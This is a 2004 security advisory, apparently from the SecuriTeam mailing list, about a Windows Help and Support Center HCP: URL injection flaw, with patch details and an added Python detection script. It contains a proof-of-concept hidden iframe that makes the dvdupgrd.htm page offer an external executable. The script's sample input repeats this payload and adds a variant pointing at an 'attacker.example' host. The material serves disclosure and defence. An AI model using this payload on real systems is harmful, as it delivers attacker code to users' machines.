[NT] Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/12/04

    To: list@securiteam.com
    Date: 12 May 2004 19:02:26 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - - - - - - - -

      Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)
    ------------------------------------------------------------------------

    SUMMARY

    "Help and Support Center (HSC) is a feature in Windows that provides help
    on a variety of topics." It can also be accessed via HCP: URLs. HSC is
    installed by default on Windows XP and Windows Server 2003 systems.

    An input validation vulnerability in HSC exposes users to remote code
    execution. An attacker could use this vulnerability to run arbitrary code
    whenever the victim opens a specially formatted HCP: URL. The user may be
    automatically directed to such a URL whenever he visits a particular web
    page. The issue can also be exploited via e-mail.

    DETAILS

    Vulnerable Systems:
     * Microsoft Windows XP and Microsoft Windows XP Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Version 2003
     * Microsoft Windows Server 2003
     * Microsoft Windows Server 2003 64-Bit Edition

    The HSC installation contains various HTML and JavaScript files which are
    intended for HSC's internal use. The HTML files belong to the My Computer
    Zone because they require, for example, the ability to launch external
    helper programs from JavaScript.

    By using a specially crafted URL, an attacker can cause the user's local
    machine to start helpctr.exe, which renders in the local context and is
    passed the injected URL. The user is then presented with the Help and
    Support DVD Upgrade dialog in Help and Support Center.

    On the Dvdupgrade page, the injected URL is linked to the "upgrade now"
    button. When the user presses the "upgrade now" button, an Open/Save dialog
    box is presented for the offending (attacker's) file.

    This allows an attacker to initiate the Dvdupgrade action in HSC and inject
    JavaScript code that runs in the context of these HTML files, specifically
    "HCP://system/DVDUpgrd/dvdupgrd.htm". In this way the attacker can run
    scripts in the My Computer Zone, which can, for example, download and start
    an attacker-supplied EXE program.

    As an aside, no URL activity is displayed, and Help and Support Center has
    no address or status bar.

    Solution:
    Microsoft was contacted on March 18th, 2004. A patch has been produced to
    correct the vulnerability. They have issued the following advisory:
    http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx

    Proof of Concept:
    <iframe
    src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe" width="1" height="1">
    </iframe>

    http://exploitlabs.com/msnspoof/poc/
    http://exploitlabs.com/msnspoof/poc/index2.html
    http://exploitlabs.com/msnspoof/poc/index3.jpg
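    The following detection script is an added example and is not part of the
    advisory or of exploitlabs' material. It scans HTML or e-mail text for HCP:
    URLs, and raises the severity when the URL targets the dvdupgrd.htm page
    named above with a non-empty "website" parameter, which is the injection
    vector the advisory describes. The regular expressions, the function names,
    the severity levels and the sample input (apart from the proof-of-concept
    iframe quoted from the advisory) are this editor's own constructions; the
    "attacker.example" host and the "hcp://system/home.htm" link are
    placeholders, not real HSC paths.

```python
"""Flag HCP: URLs that invoke the Help and Support Center DVD upgrade page
with an attacker-controlled "website" parameter (added example, not the
advisory's code)."""

import html
import re
from urllib.parse import parse_qs

# Any HCP: URL, terminated by whitespace or an HTML delimiter (editor's rule).
HCP_ANY = re.compile(r"hcp:[^\s\"'<>]+", re.IGNORECASE)

# The dvdupgrd.htm page path from the advisory, with optional query string.
# Accepts forward or back slashes and any case, so trivial reformatting of the
# path does not evade the rule.
HCP_DVDUPGRD = re.compile(
    r"hcp:[/\\]*system[/\\]+dvdupgrd[/\\]+dvdupgrd\.htm(\?[^\s\"'<>]*)?",
    re.IGNORECASE,
)

# Constructed sample: a benign-looking HCP link (placeholder path), the
# advisory's proof-of-concept iframe, an entity-encoded variant using a
# placeholder host, and an ordinary http link that must not be flagged.
SAMPLE_HTML = """\
<html><body>
<a href="hcp://system/home.htm">Open Help</a>
<iframe src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe" width="1" height="1"></iframe>
<a href="hcp://system/dvdupgrd/dvdupgrd.htm?lang=en&amp;website=attacker.example/update.exe">Upgrade</a>
<a href="http://www.securiteam.com">News</a>
</body></html>
"""


def scan_text(text):
    """Return one finding per HCP: URL found in text.

    Each finding is a dict with the 1-based line number, the URL, the value of
    the "website" parameter (None if absent) and a severity:
      info   - an HCP: URL that does not reference dvdupgrd.htm
      medium - dvdupgrd.htm referenced without a website parameter
      high   - dvdupgrd.htm referenced with a non-empty website parameter
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        # Decode HTML entities first so "&amp;" cannot hide a parameter.
        decoded = html.unescape(line)
        for match in HCP_ANY.finditer(decoded):
            url = match.group(0)
            finding = {"line": lineno, "url": url, "website": None,
                       "severity": "info"}
            dvd = HCP_DVDUPGRD.match(url)
            if dvd:
                finding["severity"] = "medium"
                # Strip the leading "?" and parse the query; parse_qs also
                # percent-decodes values, so an encoded host is still seen.
                query = dvd.group(1)[1:] if dvd.group(1) else ""
                website = parse_qs(query, keep_blank_values=True)
                website = website.get("website", [""])[0]
                if website:
                    finding["website"] = website
                    finding["severity"] = "high"
            findings.append(finding)
    return findings


def high_severity_count(text):
    """Convenience helper: number of findings that carry a website payload."""
    return sum(1 for f in scan_text(text) if f["severity"] == "high")


if __name__ == "__main__":
    for f in scan_text(SAMPLE_HTML):
        print(f"line {f['line']:>2} [{f['severity']:<6}] {f['url']}"
              + (f"  website={f['website']}" if f["website"] else ""))
```

    Run against a saved web page or an e-mail body, the script reports the
    HCP: URLs it finds together with the external file each one would hand to
    the "upgrade now" button; anything rated high is worth blocking at the
    mail gateway or proxy until the MS04-015 patch is applied.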

    ADDITIONAL INFORMATION

    The information has been provided by Donnie Werner of exploitlabs
    <mailto:security@exploitlabs.com>.

    The original article can be found at:
    http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

